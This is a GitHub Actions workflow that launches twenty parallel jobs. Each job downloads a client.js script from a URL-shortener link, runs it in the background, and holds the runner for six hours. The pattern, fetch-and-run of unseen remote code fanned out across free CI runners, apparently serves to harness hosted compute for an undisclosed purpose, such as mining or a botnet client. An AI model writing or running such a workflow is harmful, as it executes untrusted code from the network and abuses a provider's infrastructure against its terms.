name: Run Node.js Script on Multiple Machines

on:
  workflow_dispatch:

jobs:
  run-node-1:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-4:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-5:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-6:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-7:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-8:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-9:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-10:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-11:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-12:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-13:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-14:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-15:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-16:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-17:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-18:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-19:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat

  run-node-20:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: curl -o client.js https://curl.by/T09TY/client.js
      - run: nohup node client.js > client.log 2>&1 &
      - run: sleep 21600 # 6 saat
